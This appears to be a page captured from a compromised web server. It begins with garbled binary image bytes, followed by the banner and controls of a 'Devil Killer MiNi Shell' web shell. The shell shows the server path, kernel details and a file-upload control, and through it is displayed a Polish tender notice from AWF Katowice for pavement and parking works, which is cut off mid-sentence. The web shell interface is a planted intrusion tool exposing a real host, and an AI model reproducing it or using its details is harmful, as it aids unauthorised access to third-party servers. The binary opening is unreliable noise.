JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210806/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210806/0014034801-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00140348 z dnia 2021-08-06</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa chodnika oraz parkingu wraz z modernizacją nawierzchni asfaltowej na terenie kampusu Akademii Wychowania Fizycznego im. J. Kukuczki w Katowicach, znajdującego się przy ul. Mikołowskiej 72a. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Akademia Wychowania Fizycznego im. Jerzego Kukuczki w Katowicach</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000327882</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Mikołowska 72A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Katowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">40-060</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22A - Katowicki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">aifz@awf.katowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.awf.katowice.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa chodnika oraz parkingu wraz z modernizacją nawierzchni asfaltowej na terenie kampusu Akademii Wychowania Fizycznego im. J. Kukuczki w Katowicach, znajdującego się przy ul. Mikołowskiej 72a. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6afccddb-f6b8-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00140348</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-08-06</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://awf-katowice.logintrade.net/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://awf-katowice.logintrade.net/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">z Platformy, tj.:<br/>a) Wykonawca zamierzający złożyć ofertę (wyłącznie poprzez Platformę przetargową) – zobowiązany<br/>jest zapoznać się z instrukcjami użytkowników Platformy przetargowej - dostępnymi pod adresem<br/>https://awf-katowice.logintrade.net/rejestracja/instrukcje.html oraz zaakceptować regulamin korzystania<br/>z Platformy przetargowej dostępny pod adresem: https://awfkatowice.<br/>logintrade.net/rejestracja/regulamin.html<br/>b) Złożenie oferty poprzez Platformę przetargową oznacza akceptację regulaminu, o którym mowa w<br/>ust. 1 niniejszego rozdziału SWZ.<br/>2. Wymagania techniczne, jakim musi odpowiadać sprzęt komputerowych Wykonawcy, aby móc<br/>korzystać z Platformy:<br/>a) Dopuszczalne przeglądarki internetowe: Internet Explorer 8, Internet Explorer 9, Internet Explorer<br/>10, Internet Explorer 11, Google Chrome 31, Mozilla Firefox 26, Opera 18<br/>3. Pozostałe wymagania techniczne:<br/>a) dostęp do sieci internet;<br/>b) obsługa przez przeglądarkę protokołu XMLHttpRequest – ajax;<br/>c) włączona obsługa JavaScript;<br/>d) zalecana szybkość łącza internetowego powyżej 500 KB/s;<br/>e) zainstalowany Acrobat Reader;<br/>f) zainstalowane środowisko uruchomieniowe Java - Java SE Runtime Environment 6 Update 24 lub<br/>nowszy<br/>4. Wsparcia technicznego w zakresie działania Platformy przetargowej udziela jej dostawca, tj.<br/>Logintrade S.A., ul. Legnicka 57 D lok. B/J, 53-680 Wrocław; numer telefonu 71/787 35 34 (od<br/>poniedziałku do piątku, w dni robocze w godzinach 8:00-16:00); adres e-mail: helpdesk@logintrade.net<br/>5. Sposoby złożenia oferty za pośrednictwem Platformy przetargowej oraz potwierdzenia złożenia<br/>oferty (w zależności od wyboru opcji z logowaniem lub bez logowania), zostały opisane w Instrukcjach<br/>użytkowników Platformy przetargowej.<br/>6. Oferty, oświadczenia, o których mowa w art. 125 ust. 1 ustawy, podmiotowe środki dowodowe, w tym<br/>oświadczenie, o którym mowa w art. 117 ust. 4 ustawy, oraz zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w art. 118 ust. 3 ustawy, zwane dalej „zobowiązaniem podmiotu<br/>udostępniającego zasoby”, przedmiotowe środki dowodowe, pełnomocnictwo, sporządza się w postaci<br/>elektronicznej, w formatach danych określonych w przepisach wydanych na podstawie art. 18 ustawy z<br/>dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne (Dz.U.<br/>z 2020 r. poz. 346, 568, 695, 1517 i 2320), z zastrzeżeniem formatów, o których mowa w art. 66 ust. 1<br/>ustawy, z uwzględnieniem rodzaju przekazywanych danych.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia 4 maja 2016<br/>r., str. 1; zwanym dalej „RODO”) informujemy, że:<br/>1) administratorem Pani/Pana danych osobowych jest Akademia Wychowania Fizycznego im. J.<br/>Kukuczki w Katowicach, Ul. Mikołowska 72a, 40-065 Katowice<br/>2) administrator wyznaczył Inspektora Danych Osobowych, Pana Grzegorza Szade, z którym można<br/>się kontaktować pod adresem e-mail: g.szade@awf.katowice.pl<br/>3) Pani/Pana dane osobowe przetwarzane będą w celu przeprowadzenia postępowania o udzielenie<br/>zamówienia publicznego.<br/>4) Podstawą prawną przetwarzania art. 6 ust. 1 lit c) RODO w związku z przepisami prawa krajowego:<br/>a. ustawa z dnia 11 września 2019 r. roku Prawo zamówień publicznych, zwana dalej „p.z.p.”<br/>b. ustawa o narodowym zasobie archiwalnym i archiwach.<br/>5) Państwa dane pozyskane w związku z postępowaniem o udzielenie zamówienia publicznego<br/>przekazywane będą wszystkim zainteresowanym podmiotom i osobom, gdyż, co do zasady,<br/>postępowanie o udzielenie zamówienia publicznego jest jawne.<br/>6) Pani/Pana dane osobowe mogą być przekazywane do państw trzecich.<br/>7) Pani/Pana dane osobowe będą przechowywane, przez okres przeprowadzenia postępowania, a<br/>następnie zostaną zarchiwizowane na okres 5 lat.<br/>8) W przypadku zamówień współfinansowanych ze środków pochodzących z budżetu Unii<br/>Europejskiej, Pani/Pana dane osobowe będą przechowywane przez okres do lat 10 zgodnie z<br/>przepisami dotyczącymi archiwizacji danych, określonych w wytycznych dotyczących danego projektu.<br/>9) Posiada Pani/Pan prawo:<br/>a. dostępu do danych, na mocy art. 15 RODO,<br/>b. prawo do sprostowania danych, na mocy art. 16 RODO,<br/>c. żądania od administratora ograniczenia przetwarzania danych, na mocy art. 18 RODO.<br/>10) Skorzystanie przez Panią/Pana, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa<br/>w art. 16 RODO, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani<br/>zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą.<br/>11) W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o<br/>którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu<br/>zakończenia tego postępowania.<br/>12) W przypadku, gdy uzna Pani/Pan, że przetwarzanie przez Administratora Pani/Pana danych<br/>osobowych narusza przepisy RODO, posiada Pani/Pan prawo wniesienia skargi do organu<br/>nadzorczego, tj. Prezesa Urzędu Ochrony Danych Osobowych;.<br/>13) Obowiązek podania przez Wykonawcę danych osobowych bezpośrednio go dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy p.z.p., związanym z udziałem w<br/>postępowaniu o udzielenie zamówienia publicznego, konsekwencją niepodania danych może być<br/>odrzucenie oferty;<br/>14) W oparciu o przetwarzane dane administrator nie będzie podejmował zautomatyzowanych decyzji, w tym decyzji będących wynikiem profilowania.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">W postępowaniu o udzielenie zamówienia zgłoszenie<br/>żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza<br/>przetwarzania danych osobowych do czasu zakończenia tego postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/11/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest Przebudowa chodnika oraz parkingu wraz z modernizacją<br/>nawierzchni asfaltowej na terenie kampusu Akademii Wychowania Fizycznego im. Jerzego<br/>Kukuczki w Katowicach, znajdującego się przy ul. Mikołowskiej 72a, w szczególności wykonanie<br/>robót budowlanych w zakresie:<br/>• Rozbiórki oraz budowy chodnika o nawierzchni z betonowej kostki brukowej Budowy parkingu ,<br/>• Robót remontowych – frezowanie nawierzchni bitumicznej oraz położenie nawierzchni z<br/>mieszanek mineralno asfaltowych . </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-10-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">KRYTERIA I SPOSÓB OCENY OFERT<br/>Kryteria oceny ofert:<br/>Do oceny ofert przyjmuje się następujące kryteria:<br/>Cena brutto – wartość kryterium - 60 %<br/>Podstawą oceny jest wartość zamówienia brutto zaproponowana przez Wykonawcę w formularzu ofertowym (załącznik nr 1 SWZ).<br/>Kryterium ceny - (Kc).<br/>Kc = Najniższa cena brutto spośród nieodrzuconych ofert x 100 x 60%<br/>Cena brutto w badanej nieodrzuconej ofercie<br/>Maksymalna ilość punktów do uzyskania w kryterium „Cena” wynosi – 60 pkt. Zamawiający wyliczy<br/>liczbę punktów uzyskanych przez poszczególne oferty w oparciu o ww. wzór z dokładnością do dwóch<br/>miejsc po przecinku.<br/>Kryterium okres gwarancji – wartość kryterium - 40 %<br/>W ramach kryterium dodatkowy okres gwarancji na wszelkie prace i roboty budowlane oraz<br/>dostarczone i wbudowane materiały objęte przedmiotem umowy Wykonawcom zostaną przyznane<br/>punkty za udzielenie dodatkowego okresu gwarancji, który należy podać w formularzu ofertowym i<br/>zostanie oceniony w ramach następujących zasad:<br/>Oferta o najdłuższym terminie gwarancji otrzyma 40 punktów.<br/>Pozostałe oferty - ilość punktów zostanie ustalona według wzoru:<br/>G<br/>Kg = --------------------- X 40 pkt.<br/>Gmax<br/>gdzie:<br/>G – gwarancja oferty ocenianej,<br/>Gmax – gwarancja – termin najdłuższy,<br/>Kg – liczba punktów przyznanych ocenianej ofercie.<br/>Minimalny okres gwarancji dla zamówienia to 36 miesiące liczone od daty końcowego odbioru<br/>przedmiotu zamówienia. Wykonawca, który zaproponuje maksymalny okres gwarancji - czyli 60<br/>miesięcy lub więcej otrzyma maksymalną ilość punktów w tym kryterium.<br/>UWAGA<br/>W przypadku, gdy Wykonawca w formularzu oferty nie poda okresu gwarancji, Zamawiający przyjmie<br/>do obliczeń min. okres gwarancji tj. 36 miesięcy od daty podpisania przez Zamawiającego Protokołu Odbioru Końcowego.<br/>Jeżeli Wykonawca w ofercie wpisze okres krótszy niż 36 miesięcy oferta będzie podlegać odrzuceniu.<br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska największą liczbę punktów obliczoną według<br/>wzoru:<br/>P = Kc + Kg<br/>Kc – ilość punktów w kryterium cena oferty badanej,<br/>Kg - ilość punktów w kryterium termin gwarancji oferty badanej,<br/>P - łączna ilość punktów kryteriów cena i gwarancja.<br/>Oferta najkorzystniejsza:<br/>W przypadku wystąpienia sytuacji uniemożliwiającej dokonanie wyboru oferty najkorzystniejszej ze<br/>względu na fakt, iż dwóch lub więcej Wykonawców złoży oferty przedstawiające taki sam bilans<br/>kryteriów, Zamawiający wybierze spośród tych ofert, jako najkorzystniejszą, ofertę z najniższą ceną.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Warunki udziału w postępowaniu:<br/>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy nie podlegają wykluczeniu z<br/>postępowania na podstawie art. 108 ust 1 oraz 109 ust 1 pkt 4), 5), 7), 8) oraz spełniają poniżej<br/>określone warunki tj.:<br/>1) znajdują się w sytuacji ekonomicznej lub finansowej rozumianej, jako<br/>Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej<br/>działalności z sumą ubezpieczenia min 1.000.000,00 zł (jeden milion złotych).<br/>Uwaga: W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia (w<br/>szczególności członkowie konsorcjum, wspólnicy spółki cywilnej) ubezpieczenie winien posiadać<br/>każdy z Wykonawców występujących wspólnie lub wszyscy wykonawcy mogą być ubezpieczeni<br/>w ramach jednej łącznej polisy z zastrzeżeniem, iż suma gwarancyjna ubezpieczenia polisy<br/>indywidualnej lub łącznej nie może być niższa od określonej w warunku udziału w postepowaniu.<br/>2) posiadają właściwe zdolności techniczne lub zawodowe:<br/>• Dysponowanie osobami zdolnymi do wykonania przedmiotu zamówienia tj. min. jedną osobą,<br/>która będzie posiadać uprawnienia budowlane w specjalności drogowej wydane na podstawie<br/>obecnie obowiązujących przepisów prawa lub odpowiadające im ważne uprawnienia, które<br/>zostały wydane na podstawie wcześniej obowiązujących przepisów lub uprawnienia uzyskane<br/>według przepisów obowiązujących w kraju ich uzyskania uprawniające do pełnienia funkcji<br/>kierownika robót branży drogowej objętych niniejszym zamówieniem, osoby te winny posiadać<br/>odpowiednie uprawnienia budowlane, do sprawowania samodzielnych funkcji technicznych w<br/>budownictwie, wydane na podstawie ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz. U. z 2014r. w sprawie samodzielnych funkcji kierowniczych w budownictwie (Dz. U. z 2014 poz.1278)<br/>lub odpowiadające im inne ważne uprawnienia budowlane wydane na mocy wcześniej<br/>obowiązujących przepisów oraz aktualne zaświadczenie o wpisie na listę członków właściwej<br/>izby samorządu zawodowego (zgodnie z ustawą z dnia 15 grudnia 2000 r. o samorządach<br/>zawodowych architektów, inżynierów budownictwa oraz urbanistów – (t.j. Dz. U. z 2016 poz.<br/>1946 z późn. zm.) oraz posiada co najmniej trzy letnie doświadczenie w kierowaniu robotami<br/>budowalnymi po uzyskaniu uprawnień. Osoba musi być członkiem właściwej izby samorządu<br/>zawodowego. Funkcję kierownika mogą również sprawować osoby, które posiadają zgodnie z<br/>art. 12a ustawy Prawo budowlane, odpowiednie kwalifikacje i zostały uznane na zasadach<br/>określonych w przepisach odrębnych, w szczególności w przepisach ustawy z dnia 22 grudnia<br/>2015r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich<br/>Unii Europejskiej (Dz. U. 2016, poz. 65).( Załącznik nr 8) .<br/>a) w okresie ostatnich trzech lat przed upływem składania ofert, a jeżeli okres prowadzenia<br/>działalności jest krótszy – w tym okresie – posiadał średnioroczne zatrudnienie (umowa o pracę<br/>nie mniej niż ¾ etatu) w liczbie co najmniej 10 pracowników. Załącznik nr 10 - oświadczenie na<br/>temat wielkości średniego rocznego zatrudnienia<br/>b) zrealizowali należycie w okresie ostatnich pięciu lat przed upływem terminu składania ofert (a<br/>jeżeli okres prowadzenia działalności jest krótszy – w tym okresie) co najmniej jedną robotę,<br/>polegającą na przebudowie lub budowie drogi o wartości co najmniej 350 000,00 zł z<br/>załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w<br/>szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa<br/>budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje<br/>bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były<br/>wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest<br/>w stanie uzyskać tych dokumentów - inne dokumenty. (Załącznik nr 9)<br/>Uwaga: W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia (w<br/>szczególności członkowie konsorcjum, wspólnicy spółki cywilnej) warunki udziału w<br/>postepowaniu określone w pkt 11 ppkt. 2 może spełniać jeden z wykonawców samodzielnie, lub<br/>wykonawcy wspólnie ubiegający się o udzielenie zamówienia łącznie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) informacja z Krajowego Rejestru Karnego sporządzonej nie wcześniej niż 6 miesięcy przed jej<br/>złożeniem, w zakresie określonym w:<br/> art. 108 ust.1 pkt 1 i 2 ustawy u.p.z.p<br/> art. 108 ust 1 pkt 4 u.p.z.p. dotyczącej orzeczenia zakazu ubiegania się o zamówienie publiczne<br/>tytułem środka karnego,<br/>Uwaga: W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia (w<br/>szczególności członkowie konsorcjum, wspólnicy spółki cywilnej) informację musi złożyć każdy z<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia. Informację, o której mowa w art. 108<br/>ust. 1 pkt 4 składają wyłącznie podmioty, o których mowa w art. 2 ustawy z dnia 28 października 2002 r.<br/>o odpowiedzialności podmiotów zbiorowych za czyny zabronione pod groźbą kary (Dz. U. z2020r. poz.<br/>358 ze zm.).<br/>2) jeżeli wykonawca polega na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub<br/>ekonomicznej podmiotów udostępniających zasoby na zasadach określonych w art. 118 u.p.z.p.<br/>Wykonawca składa podmiotowe środki dowodowe potwierdzające brak podstaw do wykluczenia<br/>podmiotów udostepniających 